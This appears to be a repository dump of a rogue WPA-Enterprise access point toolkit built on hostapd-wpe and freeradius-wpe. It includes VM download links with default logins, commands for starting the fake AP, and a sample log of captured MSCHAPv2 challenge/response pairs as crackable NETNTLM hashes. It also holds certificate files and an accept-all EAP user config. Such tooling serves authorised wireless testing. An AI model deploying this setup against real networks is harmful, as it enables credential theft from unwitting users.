12 | | Operating system | Platform | Credentials | Size | Link |
13 | | ---------------- | -------- | ----------- | ---- | ---- |
14 | | Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | [MEGA](https://mega.nz/file/5glEzKKa#SCmh95KdM28uPt-h8J5xtu4pQrnn_3yrI2kLnaSq3nw) |
15 | | Kali 2019.1 | VMware | root:wifi | 4.99 GB | [MEGA](https://mega.nz/file/11sDVSoB#KMq5yWvuGUFwGhqzd-5hE21Xsfxsp0UMauQKntMbs38) |
16 | | Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | [MEGA](https://mega.nz/file/N5slGZLC#Dx1rBEMoNOAqdaEpB7BHhRi26HDxkJlyoQNk0frWDkw) |
17 | | Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | [MEGA](https://mega.nz/file/pl0j3ZwC#zE_skdeUCLoOSQHvtHrvejmA4Ktn9Qk0Sk0qI1d4KeI) |
18 |
19 |
20 | ## Hostapd & Freeradius-wpe
21 |
22 | Start the Access Point using:
23 |
24 | ```
25 | sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
26 | ```
27 |
28 | Or if you are using the virtual machine:
29 | ```
30 | freeradiuswpe $AP_NAME $INTERFACE
31 | ```
32 |
33 | 
34 |
35 | When a client connects, read logs with:
36 |
37 | ```
38 | sh freeradius_wpe_read.sh
39 | ```
40 |
41 | Or if you are using the virtual machine:
42 |
43 | ```
44 | readlog
45 | ```
46 | 
47 |
48 | Result:
49 |
50 | 
51 |
52 |
53 |
54 | ## Hostapd-wpe
55 |
56 | Start the Access Point using:
57 |
58 | ```
59 | sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
60 | ```
61 |
62 | Or if you are using the virtual machine:
63 |
64 | ```
65 | start_wpe $AP_NAME $INTERFACE
66 | ```
67 |
68 | 
69 |
70 |
71 |
72 | ## Installation
73 |
74 | In case you do not want to use the virtual machine, you can install everything using:
75 |
76 | ```
77 | sh install.sh
78 | ```
79 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/hostapd-wpe.log:
--------------------------------------------------------------------------------
1 |
2 |
3 | mschapv2: Mon Apr 17 01:41:02 2017
4 | username: test
5 | challenge: 4b:5d:38:bb:ad:b2:c1:54
6 | response: e0:d9:a4:7e:c8:d9:67:46:c7:b2:10:02:7f:a1:12:42:cc:94:e1:04:45:82:e7:0a
7 | jtr NETNTLM: test:$NETNTLM$4b5d38bbadb2c154$e0d9a47ec8d96746c7b210027fa11242cc94e1044582e70a
8 |
9 |
10 | mschapv2: Mon Apr 17 01:42:15 2017
11 | username: test
12 | challenge: 5c:72:b2:36:ec:9b:15:86
13 | response: 42:39:8c:f7:ca:77:e3:c9:50:3b:73:49:9f:e1:d1:aa:aa:e8:ee:78:24:0e:06:7d
14 | jtr NETNTLM: test:$NETNTLM$5c72b236ec9b1586$42398cf7ca77e3c9503b73499fe1d1aaaae8ee78240e067d
15 |
16 |
17 | mschapv2: Mon Apr 17 01:43:27 2017
18 | username: ufka
19 | challenge: 5c:cf:c0:7b:64:4c:e3:45
20 | response: a5:20:a2:0a:d8:f9:38:00:8b:fa:2d:74:ec:ec:10:21:e7:0f:92:22:59:fe:f7:79
21 | jtr NETNTLM: ufka:$NETNTLM$5ccfc07b644ce345$a520a20ad8f938008bfa2d74ecec1021e70f922259fef779
22 |
23 |
24 | mschapv2: Mon Apr 17 01:43:33 2017
25 | username: ufka
26 | challenge: 7f:4a:73:ba:ea:96:05:54
27 | response: dd:98:72:31:99:cc:ec:7c:d1:5a:a1:22:c7:dd:84:50:c0:e3:7b:d1:f6:08:8b:e5
28 | jtr NETNTLM: ufka:$NETNTLM$7f4a73baea960554$dd98723199ccec7cd15aa122c7dd8450c0e37bd1f6088be5
29 |
30 |
31 | mschapv2: Mon Apr 17 01:43:41 2017
32 | username: ufka
33 | challenge: 51:63:b8:cb:8d:a5:02:3b
34 | response: ae:1c:11:a9:af:32:a9:06:60:e4:ff:71:f3:f8:f7:da:b2:39:40:64:5d:95:65:d3
35 | jtr NETNTLM: ufka:$NETNTLM$5163b8cb8da5023b$ae1c11a9af32a90660e4ff71f3f8f7dab23940645d9565d3
36 |
37 |
38 | mschapv2: Mon Apr 17 01:43:51 2017
39 | username: ufka
40 | challenge: 7d:67:b2:10:28:df:d7:a1
41 | response: b6:12:cc:37:8e:fd:4f:e0:04:22:cd:1d:dc:22:99:09:f9:d3:12:51:cd:f8:27:8e
42 | jtr NETNTLM: ufka:$NETNTLM$7d67b21028dfd7a1$b612cc378efd4fe00422cd1ddc229909f9d31251cdf8278e
43 |
44 |
45 | mschapv2: Wed Apr 3 23:39:16 2019
46 | username: tt
47 | challenge: e2:1b:7b:24:5f:07:ee:fa
48 | response: 69:f1:08:35:28:ea:0e:e4:10:d4:c7:58:94:3a:b8:83:f3:38:0d:25:75:08:a6:07
49 | jtr NETNTLM: tt:$NETNTLM$e21b7b245f07eefa$69f1083528ea0ee410d4c758943ab883f3380d257508a607
50 |
51 |
52 | mschapv2: Wed Apr 3 23:39:28 2019
53 | username: tt
54 | challenge: 3c:71:ed:4f:e4:a6:c0:7d
55 | response: 8c:11:8b:72:5c:4e:d1:f8:d8:7c:97:fc:dc:39:b8:2d:7d:f4:4e:ab:66:d3:ec:d0
56 | jtr NETNTLM: tt:$NETNTLM$3c71ed4fe4a6c07d$8c118b725c4ed1f8d87c97fcdc39b82d7df44eab66d3ecd0
57 |
58 |
59 | mschapv2: Wed Apr 3 23:39:31 2019
60 | username: tt
61 | challenge: 33:38:b1:22:ce:e2:4a:f7
62 | response: af:ff:47:68:5f:f5:d7:f7:3e:50:c1:a3:4a:49:2a:7f:59:44:bf:30:ce:08:dc:99
63 | jtr NETNTLM: tt:$NETNTLM$3338b122cee24af7$afff47685ff5d7f73e50c1a34a492a7f5944bf30ce08dc99
64 |
65 |
66 | mschapv2: Wed Apr 3 23:39:38 2019
67 | username: tt
68 | challenge: cf:a1:fa:72:bb:51:f2:c1
69 | response: a8:08:c7:c4:e4:93:0a:57:6c:b2:ae:c6:f0:de:9c:05:ea:ce:db:c0:07:4f:2c:60
70 | jtr NETNTLM: tt:$NETNTLM$cfa1fa72bb51f2c1$a808c7c4e4930a576cb2aec6f0de9c05eacedbc0074f2c60
71 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/bootstrap:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #
3 | # This is a wrapper script to create default certificates when the
4 | # server first starts in debugging mode. Once the certificates have been
5 | # created, this file should be deleted.
6 | #
7 | # Ideally, this program should be run as part of the installation of any
8 | # binary package. The installation should also ensure that the permissions
9 | # and owners are correct for the files generated by this script.
10 | #
11 | # $Id$
12 | #
13 | umask 027
14 | cd `dirname $0`
15 |
16 | make -h > /dev/null 2>&1
17 |
18 | #
19 | # If we have a working "make", then use it. Otherwise, run the commands
20 | # manually.
21 | #
22 | if [ "$?" = "0" ]; then
23 | make all
24 | exit $?
25 | fi
26 |
27 | #
28 | # The following commands were created by running "make -n", and edited
29 | # to remove the trailing backslash, and to add "exit 1" after the commands.
30 | #
31 | # Don't edit the following text. Instead, edit the Makefile, and
32 | # re-generate these commands.
33 | #
34 | if [ ! -f dh ]; then
35 | openssl dhparam -out dh 1024 || exit 1
36 | if [ -e /dev/urandom ] ; then
37 | dd if=/dev/urandom of=./random count=10 >/dev/null 2>&1;
38 | else
39 | date > ./random;
40 | fi
41 | fi
42 |
43 | if [ ! -f server.key ]; then
44 | openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1
45 | fi
46 |
47 | if [ ! -f ca.key ]; then
48 | openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1
49 | fi
50 |
51 | if [ ! -f index.txt ]; then
52 | touch index.txt
53 | fi
54 |
55 | if [ ! -f serial ]; then
56 | echo '01' > serial
57 | fi
58 |
59 | if [ ! -f server.crt ]; then
60 | openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1
61 | fi
62 |
63 | if [ ! -f server.p12 ]; then
64 | openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1
65 | fi
66 |
67 | if [ ! -f server.pem ]; then
68 | openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1
69 | openssl verify -CAfile ca.pem server.pem || exit 1
70 | fi
71 |
72 | if [ ! -f ca.der ]; then
73 | openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1
74 | fi
75 |
76 | if [ ! -f client.key ]; then
77 | openssl req -new -out client.csr -keyout client.key -config ./client.cnf
78 | fi
79 |
80 | if [ ! -f client.crt ]; then
81 | openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
82 | fi
83 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.pem:
--------------------------------------------------------------------------------
1 | Bag Attributes
2 | localKeyID: 4E 3F 1F EF 1C 05 75 B9 BE 4C 43 11 60 35 4F F7 DB 7B 44 80
3 | subject=/C=FR/ST=Radius/O=Example Inc./CN=Example Server Certificate/emailAddress=admin@example.com
4 | issuer=/C=FR/ST=Radius/L=Somewhere/O=Example Inc./emailAddress=admin@example.com/CN=Example Certificate Authority
5 | -----BEGIN CERTIFICATE-----
6 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx
7 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF
8 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw
9 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xODAzMDcy
10 | MDI1NDVaFw0xOTAzMDcyMDI1NDVaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS
11 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT
12 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu
13 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwOvP9/Hbm4XDxR0U
14 | pCsO+QAgsaoU6w0QX0AfMLMy/T9G94iy97fMxMhJU/9nshu6g4GUrRjGCqGXo6AU
15 | 8k/6MpKM60/AvqkpGZPM4NVroIKjF3DIwsksON59oniY52BrnJEvJzUNx/V7fzp/
16 | AVIQpwxhD0RrSBzj9BQVPMA2ga9TP9ydf9ZOHaGqreTDaWoFnSkG/zb+8eNGY9hj
17 | Gzvl8c/wNs4pKB2FPN9LShc+xyOiBmT2K7o2yPQ0Vy+UXrz4enzYYovvg8YrFvkq
18 | a54htTd9fal+pIcbWr0BoFGt4+vOiy+aQsi4AqkVeSW1cSm/pAS1yVAuO8ePRe+2
19 | gY4cMQIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF
20 | AAOCAQEAAUzEKlUfdQVPzMMz3IXGIfI80q5CAldMwZioF8LMCgIGv+VOh8a9W7Rc
21 | Dx1uVSfdqjwN5lVSd44SGKUrErxns2Ihwt+Jj0EPYB1emykF+iJFjpO7uCQ84jer
22 | RhWoZNYwEyJq4Ejt5z1x98rUXbEGtS19QuoTz7k8JHs5KomGYoXPjQBRlrw8gwwO
23 | fLypfQIa7hZXyDm1JSCTG4FI7MkLOULdr+8a4KIu3zoK5Nw87ll5Ob8Vg/CprrCU
24 | DkV2LM5QxJO8yGBBkM4Jr65VYeWDgqwu35U6ueNNDXQk2P8/kIZvyDGfvU1bjrO4
25 | CSQBON7qALyVnn83OKJhdAn43+ZK7Q==
26 | -----END CERTIFICATE-----
27 | Bag Attributes
28 | localKeyID: 4E 3F 1F EF 1C 05 75 B9 BE 4C 43 11 60 35 4F F7 DB 7B 44 80
29 | Key Attributes:
30 | -----BEGIN ENCRYPTED PRIVATE KEY-----
31 | MIIFDjBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQI/dvFOu9z57kCAggA
32 | MBQGCCqGSIb3DQMHBAh4rZdkdc3KhQSCBMiS0NHR3fHEfyqE0vnYl8+Pz8S43hxq
33 | H65xPJgnqJkcSySm7MM84HBOd6K9TMPAmROC3fCDsPxjABQGte4Nk27LaAwpBdzE
34 | CEHUN08Py3s/pN7FTdUvDIipgrp5Om4JWrZzIkNpcHxQVx7mWsZCrq30YY35Nize
35 | b8bwJt10Xcj+PLYswVyL8zNY7G+lHkGEzVkj0n9jMoBeQwswsJ2NC66AXnUcShuv
36 | TTlNOU+4SBO7APi23xNZYmSX7njAqkiNCkDCLM5eQYI57Qh9NlDCUkNwfJdWlVKg
37 | QVsFcMq/AkNbK2F+P9lcCtT6hUX0Kbd4ZbEA+6yF9OvVpxtfIBl23RZOV9V2zkOq
38 | r6XRkEURQC+jIaJaUTqVv7f2B+pGq14mIp2r7CS2cnfgJpVOBBCxwPLjJFVv7vpW
39 | 4pXDUC//fSNQ62lX5P6HrhD4URjPhf+AUPQB5D8irinb0x1/BXE+8L5pr60m6GYc
40 | TEL/tAfc/pEGs1UCKZPrKGdMQVyp+DOvEL6LM0HgTwCzyYl9Ft/wogGZZ4Ht/IQu
41 | PDUFzOL+BzLR0i9JtggL+S92ZDSmldTuwfBLTFDijO5qkq/NpdcjbTcFlaI3N+CR
42 | OKxm3keKwpYPz8WhZuwRfjI0hjMoJPnUTlty6+66i6+EskMLoGUVRqqFLRvy1REF
43 | y3VwoLIbl8bSozXIU3VrQxR11+nXcCBBKfuPTpo1PQoR5yjaGknfDUKzwBIlke8r
44 | dQSc+ddxd7gQLECawjcHljsNk/JhGuOi+miemJbNXADTyU0q/Zu+3qXxSTBNdSuE
45 | Q4HkygyyDjumQcyyOhbq1S7EJQ1kVB20k832gp6ZYfT/pAEpCB7KHOgtFm2Sldni
46 | 54bIoQ1dfaFLQ9RD6P2hLw8SUrAjuRUdjVSSeyPS295zZvt9nIQSg8gjkQAEX9RL
47 | qxNX9HkhmN26TMVsEawxUxRML6luwsuiN97NI3g+H0z90Rr+IXF7VImnnYkOlwcX
48 | jDb00Mfglsgycurrd7XLNKZrinS30zS7O8IrxYVvv7j2tz063zcVwBoXTX302kj7
49 | YyVsAEqyofqdti6yh6ccZpMq0A5zFwrNj4P9euv4K2/P48C6VBCxbv0G4JbwNKio
50 | q0S1IwXMCjExRl/OIOjMPg3V6K8WRpO9tjOf+/1gbNtrj7wlm4cAZ5uKZGNeH+Dc
51 | c9/YhOrKbmlp1vtdqujeVqiztV+e5/Rr73veYRR0yNnF62RlzbV7qwNCdeNdOwPe
52 | lB2O7qo2Iu8jpIBeoVHGftC7OELceiZqtVbI76Nszr3cEmtRB74fmYjB/qQiB0rd
53 | EQg5z8Hh//sYrXOQqJ/0jZiGUT603uQhuIBalvHSfuBb7sx2GXAdNy6VFqIy3iTi
54 | O7EDIT1xfezT42AC5qfC2m7dR66QOTYBckn2G/Arf68lTofizOgEMmshmdNefwOQ
55 | dJ1/NkJnGbwGClAhRancZK1y+Nnl1GMxWkUjtCJz6dljBnp/rZBLll6MJcuhn8Ya
56 | 6uWD1AO7eqzGR9bumyeaoc8Ogb9gRHbKY/DPIil9LBF6j0M0Dp09h1tnqPB5N+vz
57 | cKdtVo3t6SHvskVCrrPRX7tL/SGp0CugCt1qAukplDxnknA1YvCVBMBhMkk/7PmZ
58 | fj8=
59 | -----END ENCRYPTED PRIVATE KEY-----
60 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/hostapd-wpe.eap_user:
--------------------------------------------------------------------------------
1 | # hostapd user database for integrated EAP server
2 |
3 | # Each line must contain an identity, EAP method(s), and an optional password
4 | # separated with whitespace (space or tab). The identity and password must be
5 | # double quoted ("user"). Password can alternatively be stored as
6 | # NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
7 | # in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
8 | # that the plaintext password does not need to be included in the user file.
9 | # Password hash is stored as hash:<16-octets of hex data> without quotation
10 | # marks.
11 |
12 | # [2] flag in the end of the line can be used to mark users for tunneled phase
13 | # 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
14 | # identity can be used in the unencrypted phase 1 and the real user identity
15 | # is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
16 | # access is needed, two user entries is needed, one for phase 1 and another
17 | # with the same username for phase 2.
18 | #
19 | # EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
20 | # password option.
21 | # EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
22 | # password.
23 | # EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
24 | #
25 | # * can be used as a wildcard to match any user identity. The main purposes for
26 | # this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
27 | # avoid having to configure every certificate for EAP-TLS authentication. The
28 | # first matching entry is selected, so * should be used as the last phase 1
29 | # user entry.
30 | #
31 | # "prefix"* can be used to match the given prefix and anything after this. The
32 | # main purpose for this is to be able to avoid EAP method negotiation when the
33 | # method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
34 | # is only allowed for phase 1 identities.
35 | #
36 | # Multiple methods can be configured to make the authenticator try them one by
37 | # one until the peer accepts one. The method names are separated with a
38 | # comma (,).
39 | #
40 | # [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
41 | # version based on the Phase 1 identity. Without this flag, the EAP
42 | # authenticator advertises the highest supported version and select the version
43 | # based on the first PEAP packet from the supplicant.
44 | #
45 | # EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
46 | # Tunneled EAP methods are configured with standard EAP method name and [2]
47 | # flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
48 | # TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
49 | # plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
50 | # hash.
51 |
52 | # Phase 1 users
53 | #"user" MD5 "password"
54 | #"test user" MD5 "secret"
55 | #"example user" TLS
56 | #"DOMAIN\user" MSCHAPV2 "password"
57 | #"gtc user" GTC "password"
58 | #"psk user" PSK "unknown"
59 | #"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef
60 | #"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
61 | #"ttls" TTLS
62 | #"not anonymous" PEAP
63 |
64 |
65 | # Default to EAP-SIM and EAP-AKA based on fixed identity prefixes
66 | #"0"* AKA,TTLS,TLS,PEAP,SIM
67 | #"1"* SIM,TTLS,TLS,PEAP,AKA
68 | #"2"* AKA,TTLS,TLS,PEAP,SIM
69 | #"3"* SIM,TTLS,TLS,PEAP,AKA
70 | #"4"* AKA,TTLS,TLS,PEAP,SIM
71 | #"5"* SIM,TTLS,TLS,PEAP,AKA
72 |
73 | # Wildcard for all other identities
74 | #"brad" PEAP
75 | #"brad" MSCHAPV2 "testtest" [2]
76 | #
77 | # WPE - DO NOT REMOVE - These entries are specifically in here
78 | * PEAP,TTLS,TLS,FAST
79 | "t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2]
80 | # Not valid: PEAP-GTC, PEAP-MD5, TTLS-OTP, TTLS-GTC
81 | # Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2
82 | #"0"* AKA [2]
83 | #"1"* SIM [2]
84 | #"2"* AKA [2]
85 | #"3"* SIM [2]
86 | #"4"* AKA [2]
87 | #"5"* SIM [2]
88 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/01.pem:
--------------------------------------------------------------------------------
1 | Certificate:
2 | Data:
3 | Version: 3 (0x2)
4 | Serial Number: 1 (0x1)
5 | Signature Algorithm: md5WithRSAEncryption
6 | Issuer: C=FR, ST=Radius, L=Somewhere, O=Example Inc./emailAddress=admin@example.com, CN=Example Certificate Authority
7 | Validity
8 | Not Before: Mar 7 20:25:45 2018 GMT
9 | Not After : Mar 7 20:25:45 2019 GMT
10 | Subject: C=FR, ST=Radius, O=Example Inc., CN=Example Server Certificate/emailAddress=admin@example.com
11 | Subject Public Key Info:
12 | Public Key Algorithm: rsaEncryption
13 | Public-Key: (2048 bit)
14 | Modulus:
15 | 00:c0:eb:cf:f7:f1:db:9b:85:c3:c5:1d:14:a4:2b:
16 | 0e:f9:00:20:b1:aa:14:eb:0d:10:5f:40:1f:30:b3:
17 | 32:fd:3f:46:f7:88:b2:f7:b7:cc:c4:c8:49:53:ff:
18 | 67:b2:1b:ba:83:81:94:ad:18:c6:0a:a1:97:a3:a0:
19 | 14:f2:4f:fa:32:92:8c:eb:4f:c0:be:a9:29:19:93:
20 | cc:e0:d5:6b:a0:82:a3:17:70:c8:c2:c9:2c:38:de:
21 | 7d:a2:78:98:e7:60:6b:9c:91:2f:27:35:0d:c7:f5:
22 | 7b:7f:3a:7f:01:52:10:a7:0c:61:0f:44:6b:48:1c:
23 | e3:f4:14:15:3c:c0:36:81:af:53:3f:dc:9d:7f:d6:
24 | 4e:1d:a1:aa:ad:e4:c3:69:6a:05:9d:29:06:ff:36:
25 | fe:f1:e3:46:63:d8:63:1b:3b:e5:f1:cf:f0:36:ce:
26 | 29:28:1d:85:3c:df:4b:4a:17:3e:c7:23:a2:06:64:
27 | f6:2b:ba:36:c8:f4:34:57:2f:94:5e:bc:f8:7a:7c:
28 | d8:62:8b:ef:83:c6:2b:16:f9:2a:6b:9e:21:b5:37:
29 | 7d:7d:a9:7e:a4:87:1b:5a:bd:01:a0:51:ad:e3:eb:
30 | ce:8b:2f:9a:42:c8:b8:02:a9:15:79:25:b5:71:29:
31 | bf:a4:04:b5:c9:50:2e:3b:c7:8f:45:ef:b6:81:8e:
32 | 1c:31
33 | Exponent: 65537 (0x10001)
34 | X509v3 extensions:
35 | X509v3 Extended Key Usage:
36 | TLS Web Server Authentication
37 | Signature Algorithm: md5WithRSAEncryption
38 | 01:4c:c4:2a:55:1f:75:05:4f:cc:c3:33:dc:85:c6:21:f2:3c:
39 | d2:ae:42:02:57:4c:c1:98:a8:17:c2:cc:0a:02:06:bf:e5:4e:
40 | 87:c6:bd:5b:b4:5c:0f:1d:6e:55:27:dd:aa:3c:0d:e6:55:52:
41 | 77:8e:12:18:a5:2b:12:bc:67:b3:62:21:c2:df:89:8f:41:0f:
42 | 60:1d:5e:9b:29:05:fa:22:45:8e:93:bb:b8:24:3c:e2:37:ab:
43 | 46:15:a8:64:d6:30:13:22:6a:e0:48:ed:e7:3d:71:f7:ca:d4:
44 | 5d:b1:06:b5:2d:7d:42:ea:13:cf:b9:3c:24:7b:39:2a:89:86:
45 | 62:85:cf:8d:00:51:96:bc:3c:83:0c:0e:7c:bc:a9:7d:02:1a:
46 | ee:16:57:c8:39:b5:25:20:93:1b:81:48:ec:c9:0b:39:42:dd:
47 | af:ef:1a:e0:a2:2e:df:3a:0a:e4:dc:3c:ee:59:79:39:bf:15:
48 | 83:f0:a9:ae:b0:94:0e:45:76:2c:ce:50:c4:93:bc:c8:60:41:
49 | 90:ce:09:af:ae:55:61:e5:83:82:ac:2e:df:95:3a:b9:e3:4d:
50 | 0d:74:24:d8:ff:3f:90:86:6f:c8:31:9f:bd:4d:5b:8e:b3:b8:
51 | 09:24:01:38:de:ea:00:bc:95:9e:7f:37:38:a2:61:74:09:f8:
52 | df:e6:4a:ed
53 | -----BEGIN CERTIFICATE-----
54 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx
55 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF
56 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw
57 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xODAzMDcy
58 | MDI1NDVaFw0xOTAzMDcyMDI1NDVaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS
59 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT
60 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu
61 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwOvP9/Hbm4XDxR0U
62 | pCsO+QAgsaoU6w0QX0AfMLMy/T9G94iy97fMxMhJU/9nshu6g4GUrRjGCqGXo6AU
63 | 8k/6MpKM60/AvqkpGZPM4NVroIKjF3DIwsksON59oniY52BrnJEvJzUNx/V7fzp/
64 | AVIQpwxhD0RrSBzj9BQVPMA2ga9TP9ydf9ZOHaGqreTDaWoFnSkG/zb+8eNGY9hj
65 | Gzvl8c/wNs4pKB2FPN9LShc+xyOiBmT2K7o2yPQ0Vy+UXrz4enzYYovvg8YrFvkq
66 | a54htTd9fal+pIcbWr0BoFGt4+vOiy+aQsi4AqkVeSW1cSm/pAS1yVAuO8ePRe+2
67 | gY4cMQIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF
68 | AAOCAQEAAUzEKlUfdQVPzMMz3IXGIfI80q5CAldMwZioF8LMCgIGv+VOh8a9W7Rc
69 | Dx1uVSfdqjwN5lVSd44SGKUrErxns2Ihwt+Jj0EPYB1emykF+iJFjpO7uCQ84jer
70 | RhWoZNYwEyJq4Ejt5z1x98rUXbEGtS19QuoTz7k8JHs5KomGYoXPjQBRlrw8gwwO
71 | fLypfQIa7hZXyDm1JSCTG4FI7MkLOULdr+8a4KIu3zoK5Nw87ll5Ob8Vg/CprrCU
72 | DkV2LM5QxJO8yGBBkM4Jr65VYeWDgqwu35U6ueNNDXQk2P8/kIZvyDGfvU1bjrO4
73 | CSQBON7qALyVnn83OKJhdAn43+ZK7Q==
74 | -----END CERTIFICATE-----
75 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.crt:
--------------------------------------------------------------------------------
1 | Certificate:
2 | Data:
3 | Version: 3 (0x2)
4 | Serial Number: 1 (0x1)
5 | Signature Algorithm: md5WithRSAEncryption
6 | Issuer: C=FR, ST=Radius, L=Somewhere, O=Example Inc./emailAddress=admin@example.com, CN=Example Certificate Authority
7 | Validity
8 | Not Before: Mar 7 20:25:45 2018 GMT
9 | Not After : Mar 7 20:25:45 2019 GMT
10 | Subject: C=FR, ST=Radius, O=Example Inc., CN=Example Server Certificate/emailAddress=admin@example.com
11 | Subject Public Key Info:
12 | Public Key Algorithm: rsaEncryption
13 | Public-Key: (2048 bit)
14 | Modulus:
15 | 00:c0:eb:cf:f7:f1:db:9b:85:c3:c5:1d:14:a4:2b:
16 | 0e:f9:00:20:b1:aa:14:eb:0d:10:5f:40:1f:30:b3:
17 | 32:fd:3f:46:f7:88:b2:f7:b7:cc:c4:c8:49:53:ff:
18 | 67:b2:1b:ba:83:81:94:ad:18:c6:0a:a1:97:a3:a0:
19 | 14:f2:4f:fa:32:92:8c:eb:4f:c0:be:a9:29:19:93:
20 | cc:e0:d5:6b:a0:82:a3:17:70:c8:c2:c9:2c:38:de:
21 | 7d:a2:78:98:e7:60:6b:9c:91:2f:27:35:0d:c7:f5:
22 | 7b:7f:3a:7f:01:52:10:a7:0c:61:0f:44:6b:48:1c:
23 | e3:f4:14:15:3c:c0:36:81:af:53:3f:dc:9d:7f:d6:
24 | 4e:1d:a1:aa:ad:e4:c3:69:6a:05:9d:29:06:ff:36:
25 | fe:f1:e3:46:63:d8:63:1b:3b:e5:f1:cf:f0:36:ce:
26 | 29:28:1d:85:3c:df:4b:4a:17:3e:c7:23:a2:06:64:
27 | f6:2b:ba:36:c8:f4:34:57:2f:94:5e:bc:f8:7a:7c:
28 | d8:62:8b:ef:83:c6:2b:16:f9:2a:6b:9e:21:b5:37:
29 | 7d:7d:a9:7e:a4:87:1b:5a:bd:01:a0:51:ad:e3:eb:
30 | ce:8b:2f:9a:42:c8:b8:02:a9:15:79:25:b5:71:29:
31 | bf:a4:04:b5:c9:50:2e:3b:c7:8f:45:ef:b6:81:8e:
32 | 1c:31
33 | Exponent: 65537 (0x10001)
34 | X509v3 extensions:
35 | X509v3 Extended Key Usage:
36 | TLS Web Server Authentication
37 | Signature Algorithm: md5WithRSAEncryption
38 | 01:4c:c4:2a:55:1f:75:05:4f:cc:c3:33:dc:85:c6:21:f2:3c:
39 | d2:ae:42:02:57:4c:c1:98:a8:17:c2:cc:0a:02:06:bf:e5:4e:
40 | 87:c6:bd:5b:b4:5c:0f:1d:6e:55:27:dd:aa:3c:0d:e6:55:52:
41 | 77:8e:12:18:a5:2b:12:bc:67:b3:62:21:c2:df:89:8f:41:0f:
